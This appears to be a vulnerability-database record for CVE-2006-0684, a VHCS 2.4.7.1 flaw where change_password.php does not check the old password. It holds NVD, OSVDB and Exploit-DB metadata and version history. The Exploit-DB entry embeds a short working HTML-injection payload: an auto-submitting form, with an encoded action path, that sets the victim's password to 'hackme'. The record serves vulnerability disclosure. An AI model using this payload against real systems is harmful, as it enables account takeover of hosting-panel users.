ID CVE-2006-0684 Type cve Reporter NVD Modified 2018-10-19T11:45:51
Description
change_password.php in Virtual Hosting Control System (VHCS) 2.4.7.1 and earlier does not verify the old password when a user changes the password, which may allow remote attackers to gain unauthorized access.
{"id": "CVE-2006-0684", "bulletinFamily": "NVD", "title": "CVE-2006-0684", "description": "change_password.php in Virtual Hosting Control System (VHCS) 2.4.7.1 and earlier does not verify the old password when a user changes the password, which may allow remote attackers to gain unauthorized access.", "published": "2006-02-14T19:02:00", "modified": "2018-10-19T11:45:51", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0684", "reporter": "NVD", "references": ["http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt", "http://www.securityfocus.com/bid/16600", "https://exchange.xforce.ibmcloud.com/vulnerabilities/24665", "http://www.vupen.com/english/advisories/2006/0534", "http://www.securityfocus.com/archive/1/424816/100/0/threaded"], "cvelist": ["CVE-2006-0684"], "type": "cve", "lastseen": "2018-10-20T11:06:29", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:virtual_hosting_control_system:virtual_hosting_control_system:2.4.7.1"], "cvelist": ["CVE-2006-0684"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "change_password.php in Virtual Hosting Control System (VHCS) 2.4.7.1 and earlier does not verify the old password when a user changes the password, which may allow remote attackers to gain unauthorized access.", "edition": 2, "enchantments": {"score": {"modified": "2017-07-20T10:49:06", "value": 7.5, "vector": "NONE"}}, "hash": "8ae0da313ab7f63540838e42610b68d73d7d2ec247364038745719799c6f17cc", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "938cb86c0adbbf0a93129555ee524278", "key": "cpe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "e591fc8dbb905b7c976e5ee5941b85e3", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "91bf4ac3c97f7aa3f4ae607073276380", "key": "title"}, {"hash": "2b7745efdfb29474a497421ffc3687d1", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "2645533de90d66e2d78a58eed9858e89", "key": "description"}, {"hash": "1145ebb2dc94a2803ee9ecb060ac53b6", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "3d58674970e192f19f10afe360841c38", "key": "href"}, {"hash": "82cae5c51f7329523fdaf9c4ac3c346e", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0684", "id": "CVE-2006-0684", "lastseen": "2017-07-20T10:49:06", "modified": "2017-07-19T21:29:58", "objectVersion": "1.3", "published": "2006-02-14T19:02:00", "references": ["http://www.securityfocus.com/archive/1/archive/1/424816/100/0/threaded", "http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt", "http://www.securityfocus.com/bid/16600", "https://exchange.xforce.ibmcloud.com/vulnerabilities/24665", "http://www.vupen.com/english/advisories/2006/0534"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-0684", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-20T10:49:06"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:virtual_hosting_control_system:virtual_hosting_control_system:2.4.7.1"], "cvelist": ["CVE-2006-0684"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "change_password.php in Virtual Hosting Control System (VHCS) 2.4.7.1 and earlier does not verify the old password when a user changes the password, which may allow remote attackers to gain unauthorized access.", "edition": 1, "enchantments": {}, "hash": "40daef61be05e97670e16983e7cb171e413fa674522e43a293787bdcd076c9ee", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "938cb86c0adbbf0a93129555ee524278", "key": "cpe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "e591fc8dbb905b7c976e5ee5941b85e3", "key": "published"}, {"hash": "b61f015a8b58190b717790ec6fd11680", "key": "modified"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "91bf4ac3c97f7aa3f4ae607073276380", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "2645533de90d66e2d78a58eed9858e89", "key": "description"}, {"hash": "1145ebb2dc94a2803ee9ecb060ac53b6", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "aa1bf049fd63e349c8d30fe6f32216db", "key": "references"}, {"hash": "3d58674970e192f19f10afe360841c38", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0684", "id": "CVE-2006-0684", "lastseen": "2016-09-03T06:29:24", "modified": "2011-03-07T21:30:36", "objectVersion": "1.2", "published": "2006-02-14T19:02:00", "references": ["http://www.securityfocus.com/archive/1/archive/1/424816/100/0/threaded", "http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt", "http://xforce.iss.net/xforce/xfdb/24665", "http://www.securityfocus.com/bid/16600", "http://www.vupen.com/english/advisories/2006/0534"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-0684", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T06:29:24"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "938cb86c0adbbf0a93129555ee524278"}, {"key": "cvelist", "hash": "1145ebb2dc94a2803ee9ecb060ac53b6"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "2645533de90d66e2d78a58eed9858e89"}, {"key": "href", "hash": "3d58674970e192f19f10afe360841c38"}, {"key": "modified", "hash": "10fcd97c2bd0d76cfc2f2a73561dc1cf"}, {"key": "published", "hash": "e591fc8dbb905b7c976e5ee5941b85e3"}, {"key": "references", "hash": "e2a402271c337f83a72742235ac99b9b"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "91bf4ac3c97f7aa3f4ae607073276380"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b59843be849241e9d123d740c5f6de5248614e2a77228ba6e2f15649274c6136", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-10-20T11:06:29"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:virtual_hosting_control_system:virtual_hosting_control_system:2.4.7.1"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"osvdb": [{"lastseen": "2017-04-28T13:20:20", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.vhcs.net/\n[Secunia Advisory ID:18799](https://secuniaresearch.flexerasoftware.com/advisories/18799/)\n[Related OSVDB ID: 23108](https://vulners.com/osvdb/OSVDB:23108)\n[Related OSVDB ID: 23106](https://vulners.com/osvdb/OSVDB:23106)\n[Related OSVDB ID: 23109](https://vulners.com/osvdb/OSVDB:23109)\nOther Advisory URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0215.html\nKeyword: RS-2006-1\nFrSIRT Advisory: ADV-2006-0534\n[CVE-2006-0684](https://vulners.com/cve/CVE-2006-0684)\nBugtraq ID: 16600\n", "reporter": "OSVDB", "published": "2006-02-11T06:02:44", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "VHCS change_password.php Current Password Weakness", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-0684"], "modified": "2006-02-11T06:02:44", "href": "https://vulners.com/osvdb/OSVDB:23107", "id": "OSVDB:23107", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T05:20:28", "osvdbidlist": ["23107"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Virtual Hosting Control System 2.2/2.4 change_password.php Current Password Weakness. CVE-2006-0684. Webapps exploit for php platform", "reporter": "Roman Medina-Heigl Hernandez", "published": "2006-02-13T00:00:00", "type": "exploitdb", "title": "Virtual Hosting Control System 2.2/2.4 change_password.php Current Password Weakness", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0684"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2006-02-13T00:00:00", "id": "EDB-ID:27204", "href": "https://www.exploit-db.com/exploits/27204/", "sourceData": "source: http://www.securityfocus.com/bid/16600/info\r\n\r\nVirtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities.\r\n\r\nVHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative access to the application; other attacks are also possible.\r\n\r\n</form><form name=\"dsr\" method=\"post\" action=\"ch%61nge_password.php\"><input name=\"pass\" value=\"hackme\"><input name=\"pass_rep\" value=\"hackme\"><input name=\"uaction\" value=\"updt_pass\"></form><script>document.dsr.submit()</script>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27204/"}]}
